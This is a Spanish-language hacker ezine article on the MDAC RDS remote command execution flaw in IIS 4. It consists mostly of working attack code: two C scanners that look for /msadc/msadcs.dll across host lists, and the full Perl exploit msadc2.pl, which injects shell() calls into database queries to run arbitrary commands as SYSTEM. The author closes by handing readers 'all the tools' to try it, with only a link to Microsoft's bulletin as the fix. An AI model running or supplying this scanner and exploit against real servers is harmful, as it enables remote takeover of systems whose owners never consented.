Copy Link
Add to Bookmark
Report

MTZ: Vulnerabilidad MDAC RDS en IIS-4

eZine's profile picture
Published in 
MTeamZ
 · 2 years ago

Vulnerabilidad MDAC RDS en IIS-4
by SHYSAP


1. INTRODUCCION

Esta vulnerabilidad reside en el Remote Data Service (RDS, Servicio de Datos Remoto) de Microsoft Data Acces Components (MDAC), y lo que hace es permitir a los atacantes la ejecucion de comandos como si fuesen el usuario SYSTEM o administrador (si es que este esta conectado en ese momento).


2. ENCONTRANDO VULNERABLES

Sabemos que un servidor es vulnerable cuando posee un .dll llamado msadcs.dll. Una idea que propongo hacer es un escanner para esta vulnerabilidad, realizando una peticion al servidor, del archivo /msadc/msadcs.dll, para ver si existe. Como por ejemplo se me ocurre (°es solo un ejemplo!): (°capaz que noo anda ehh°)

/****************************************************************/ 
/* Un simple programa scanner de la vulnerabilidad MDAC RDS */
/* by SHYSAP <shysap@web-mail.com.ar> www.malorteam.com.ar */
/* Ejemplo de uso: ./vul 200.102.144.45 */
/****************************************************************/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

main(int argc, char *argv[])
{
int sock, h;
char *buff;
struct sockaddr_in sin;
struct hostent *host;

if (argc < 1)
{
printf("Uso: %s ip\n", argv[0]);
return 0;
}

if ((host = gethostbyname(argv[1])) == NULL)
{
printf("\nEl IP no es valido\n");
return 0;
}
else
h = inet_ntoa(*((struct in_addr*)host->h_addr));

sock = socket(AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr.s_addr = inet_addr(h);
bzero(&(sin.sin_zero), 8);

if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
{
printf("No se ha podido conectar el socket...\n");
printf("Intente nuevamente\n");
close(sock);
return 0;
}

send(sock, "GET /msadc/msadcs.dll HTTP/1.0\n\n", 35, 0);
recv(sock, buff, sizeof(buff), 0);
printf("Recivido: %s\n", buff);
close(sock);
return 0;
}
-----------------------------------------------------------------------------


Bueno vasta de programas super-31337, vamos a vajar un poco el nivel!..(mmm?)
A continuacion pongo un scanner mas serio de esta vul., hecho por Xphere...
A probarlo!.

/* 
* MDAC-scan.c
*
*
* Code improvements + comments always welcome.
* Send them to: gin@dds.nl.
*
* #Phreak.nl Current Website: http://www.casema.net/~gin
* Future Website: http://home.wanadoo.nl/~gin
*
* -- Xphere --
*/




#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/file.h>
#include <unistd.h>



void catch_alarm()
{
alarm(0);
signal(SIGALRM, SIG_DFL);
exit(0);
}



int main(int argc, char *argv[])
{
FILE *in, *out;
char ip[50];
int pid;
signal(SIGCHLD, SIG_IGN);
signal(SIGALRM, catch_alarm);


if (argc != 3) {
fprintf(stderr, "\n\e[0;34m[ MDAC scanner by: ");
fprintf(stderr, "Xphere -- #Phreak.nl ]\e[0m\n\n");
fprintf(stderr, "Usage: %s <host_list> <log_file> &\n", argv[0]);
exit(0);
}

in = fopen(argv[1], "r");
out = fopen(argv[2], "a");

if (in == 0) {
fprintf(stderr, "Error reading %s.\n", argv[1]);
exit(0);
}

if (out == 0) {
fprintf(stderr, "Error creating %s.\n", argv[2]);
exit(0);
}

while (fscanf(in, "%s\n", ip) != EOF) {
pid = fork();

if (pid < 0) {
fprintf(stderr, "Fork Error.\n");
exit(0);
}
else if (pid > 0) {
sleep(10); /* You got the bandwidth? */
}
else if (pid == 0) {
alarm(25);
checkh(ip, 80, argv[2]);
alarm(0);
exit(0);
}
}
sleep(5);
}



int checkh(char *ip, int port, char *file)
{
int s, r, c;
char *string = "GET /msadc/msadcs.dll HTTP/1.0\r\n\r\n";
char *search = "HTTP/1.1 200 OK";
char serv_string[100];
FILE *out;

struct sockaddr_in addr;
struct hostent *foo;
bzero((char *) &addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(ip);
addr.sin_port= htons(port);

if ((foo = gethostbyname(ip)) != NULL) {
bcopy(foo->h_addr, (char *) &addr.sin_addr, foo->h_length);
}
else {
if ((addr.sin_addr.s_addr = inet_addr(ip)) < 0) {
return(0);
}
}

s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
r = connect(s, (struct sockaddr *) &addr, sizeof(addr));

write(s, string, strlen(string));
c = 0;
while (read(s, serv_string, sizeof(serv_string)) && c == 0) {
if (strstr(serv_string, search) != NULL) {
out = fopen(file, "a");
fputs("Server: ", out);
fputs(ip, out);
fputs(" runs MDAC.\n", out);
fclose(out);
c = 1;
}
}
close(s);
return(0);
}


La forma de darse cuenta que esta vulnerabilidad esta en el sistema, es fijandose en el resultado de las peticiones GET, que realizan los programas anteriores, cuando dan como resultado en el Content-Type: application/x-varg
(ojo!, esto no quiere decir que definitivamente este)

A continuacion dejo un resultado de ejemplo:

GET /msadc/msadcs.dll HTTP/1.0 
Server: Microsoft-IIS/4.0
Host: xxx.xxx.xxx.xxx
Date: ...
Content-Type: application/x-varg
...

3. EXPLOTANDO VULNERABLES

Rain Forest Puppy hizo un exploit para esta vulnerabilidad, que lo que hace es lo que la teoria dice: nos permite ejecutar comandos remotamente en el servidor que posea esta vulnerabilidad. A continuacin dejo el codigo en perl que puede servir tanto para win como para linux. Un ejemplo de sintaxis seria

super@hacker~# perl msadc2.pl -h lammerlandia.com o 200.53.65.109


(igualmente la ayuda del programa realmente ayuda)

#!/usr/bin/perl 
#
# MSADC/RDS 'usage' (aka exploit) script version 2
#
# by rain forest puppy
#
# - added UNC support, really didn't clean up code, but oh well

use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", \%args);

print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";

if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\\\\host\\share\\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>

Or a -R will resume a (v2) command session

~; exit;}

###########################################################
# config data

@drives=("c","d","e","f","g","h");

@sysdirs=("winnt","winnt35","winnt351","win","windows");

# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");

# this is sparse, because I don't know of many
@sysmdbs=( "\\catroot\\icatalog.mdb",
"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\certmdb.mdb",
"\\system32\\ias\\ias.mdb",
"\\system32\\ias\\dnary.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
@mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
"\\cfusion\\cfapps\\security\\realm_.mdb",
"\\cfusion\\cfapps\\security\\data\\realm.mdb",
"\\cfusion\\database\\cfexamples.mdb",
"\\cfusion\\database\\cfsnippets.mdb",
"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
"\\cfusion\\brighttiger\\database\\cleam.mdb",
"\\cfusion\\database\\smpolicy.mdb",
"\\cfusion\\database\cypress.mdb",
"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
"\\website\\cgi-win\\dbsample.mdb",
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
); #these are just \
###########################################################

$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $target= inet_aton($ip)
|| die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }

if (defined $args{X}) { &hork_idx; exit; }
if (defined $args{N}) { &get_name; exit; }

if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
if (defined $args{R}) { &load; exit; }

print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;

if (!defined $args{s} || $args{s}==1){
print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;}

if (!defined $args{s} || $args{s}==2){
print "\nStep 2: Trying to make our own DSN...";
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
print "<<fail>>\n"; }} # we need to sleep to let the server catchup

if (!defined $args{s} || $args{s}==3){
print "\nStep 3: Trying known DSNs...";
&known_dsn;}

if (!defined $args{s} || $args{s}==4){
print "\nStep 4: Trying known .mdbs...";
&known_mdb;}

if (!defined $args{s} || $args{s}==5){
if (defined $args{u}){
print "\xStep 5: Trying UNC...";
&use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }}

if (!defined $args{s} || $args{s}==6){
if (defined $args{e}){
print "\nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }}

print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
exit;

##############################################################################

sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
open(OUT,">raw.out"); my @in;
select(S); $|=1; print $pstr;
while(<S>){ print OUT $_; push @in, $_;
print STDOUT "." if(defined $args{X});}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }}

##############################################################################

sub make_header { # make the HTTP request
my $aa, $bb;
if (defined $args{V}){
$aa="VbBusObj.VbBusObjCls.GetRecordset";
$bb="2";
} else {
$aa="AdvancedDataFactory.Query";
$bb="3";}

$msadc=<<EOT
POST /msadc/msadcs.dll/$aa HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive

ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb

--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen

EOT
;
$msadc=~s/\n/\r\n/g;
return $msadc;}

##############################################################################

sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;

if ($switch==1){ # this is the btcustmr.mdb query
$query="Select * from Customers where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}

elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}

elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C='|shell(\"$command\")|'";
$dsn="$p1";}

elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}

elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}

elsif ($switch==6){ # this is table-independant query (new)
$query="select * from MSysModules where name='|shell(\"$command\")|'";
$dsn="$p1";}

$t1= make_unicode($query);
$t2= make_unicode($dsn);
if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
$req.= "\x08\x00" . pack ("S1", length($t1));
$req.= "\x00\x00" . $t1 ;
$req.= "\x08\x00" . pack ("S1", length($t2));
$req.= "\x00\x00" . $t2 ;
$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
return $req;}

##############################################################################

sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}

##############################################################################

sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}

##############################################################################

sub make_dsn { # this (tries to) make a DSN for us
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
} return 0;}

##############################################################################

sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}

##############################################################################

sub try_btcustmr {

foreach $dir (@sysdirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;

my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";

save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
exit;}
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}

##############################################################################

sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}

##############################################################################

sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}

##############################################################################

sub save {
my ($p1)=@_; my $ropt="";
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
if (defined $args{c}){ $ropt="c ";}
if (defined $args{V}){ $ropt.="V ";}
if (defined $args{w}){ $ropt.="w ";}
print OUT "v2\n$ip\n$ropt\n$p1\n";
close OUT;}

##############################################################################

sub load {
my ($action)=@_;
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
open(IN,"<rds.save") || die("Couldn't open rds.save\n");
@p=<IN>; close(IN);
die("Wrong rds.save version") if $p[0] ne "v2\n";
$ip="$p[1]"; $ip=~s/\n//g;
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
@switches=split(/ /,$p[2]);
foreach $switch (@switches) {
$args{$switch}="1";}

if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;

$torun="$p[3]"; $torun=~s/\n//g;
if($torun=~/btcustmr/){
$args{'c'}="1";} # this is a kludge to make it work

if($torun=~/^dbq/){ $torun=$drvst.$torun; }

if(run_query("$torun")){
print "Success!\n";} else { print "failed\n"; }
exit;}

##############################################################################

sub create_table {
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}

##############################################################################

sub known_dsn {
foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}

##############################################################################

sub is_access {
my ($in)=@_;
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}

##############################################################################

sub run_query {
my ($in)=@_; my $req;
if (defined $args{c}){$req=3;} else {$req=6;}
$reqlen=length( make_req($req,$in,"") ) - 28;

$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req($req,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}

##############################################################################

sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";

foreach $drive (@drives) {
foreach $dir (@sysdirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv.$drive.":\\".$dir.$mdb)){
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit;
}}}}}

foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv.$drive.":".$mdb)){
if(run_query($drv.$drive.":".$mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit;
}}}}
}

##############################################################################

sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server not installed/query failed\n"; }}

##############################################################################

sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while(<IN>){
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "Success!\n"; save ("dsn=$dSn"); exit; }}}
print "\n"; close(IN);}

##############################################################################

sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually

##############################################################################

sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}
if($error=~/server has denied access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}}

##############################################################################

sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return if($results[$base]=~/Content-Type: application\/x-varg/);
my @s=grep("^Server:",@results);
if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" }
else { print "/msadc/msadcs.dll was not found.\n";}
exit;}

##############################################################################

sub use_unc {
$uncpath=$args{u};
$driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
print "Your UNC path sucks. You need the following format:\n".
"\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }

if(create_table($driverline.$uncpath)){
if(run_query($driverline.$uncpath)){
print "Success!\n"; save ("dbq=".$uncpath); exit;}}
}

##############################################################################

sub get_name { # this was added last minute
my $msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: 126
Connection: Keep-Alive

ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0

--!ADM!ROX!YOUR!WORLD!--
EOT
; $msadc=~s/\n/\r\n/g;
my @results=sendraw($msadc);
my $base=content_start(@results);
$results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
print "Machine name: $results[$base+6]\n";}

##############################################################################
# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
#
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
#
# I wish I could really name everyone, but I can't. Don't feel slighted if
# your not on the list... :)
##############################################################################

4. DESPEDIDA

Bueno espero hayan entendido y puedan probar esta vulnerabilidad, ya que les doy todas las herramientas, no se pueden quejar...
Ya saben que por cualquier duda me pueden consultar y si no se las puedo responder, averiguare sobre lo que me preguntes. Nunca esta de mas aprender algo nuevo, ni viejo...
Para la "solucion" a este problema:
http://www.microsoft.com/security/bulletins/ms99-025faq.asp

SHYSAP ---> shysap@web-mail.com.ar
^^^^^^ ---> www.malorteam.com.ar

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT